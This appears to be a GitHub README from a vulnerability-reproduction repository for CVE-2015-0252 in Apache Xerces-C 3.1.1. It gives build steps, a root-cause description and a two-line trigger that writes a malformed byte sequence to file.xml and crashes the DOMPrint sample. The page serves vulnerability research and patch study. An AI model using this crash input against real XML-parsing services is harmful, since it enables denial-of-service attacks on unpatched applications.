Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
Patch_Of_XMLReader
README.md

README.md

CVE-2015-0252

Experiment Environment

CentOS 6.5

INSTALL & Configuration

wget https://github.com/mudongliang/source-packages/raw/master/CVE-2015-0252/xerces-c-3.1.1.tar.gz
tar -xvf xerces-c-3.1.1.tar.gz
cd xerces-c-3.1.1
./configure
make

Problems in Installation & Configuration

How to trigger vulnerability

printf "\xff\xfe\x00\x00\x3c" > file.xml
./samples/DOMPrint ./file.xml

PoCs

Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)

Apache Xerces-C XML Parser Denial Of Service

Vulnerability Details & Patch

Root Cause

The Xerces-C XML parser mishandles certain kinds of malformed input documents, resulting in a segmentation fault during a parse operation. The bug does not appear to allow for remote code execution, but is a denial of service attack that in many applications may allow for an unauthenticated attacker to supply malformed input and cause a crash.

Stack Trace

Patch

Diff of /xerces/c/branches/xerces-3.1/src/xercesc/internal/XMLReader.cpp

References

You can’t perform that action at this time.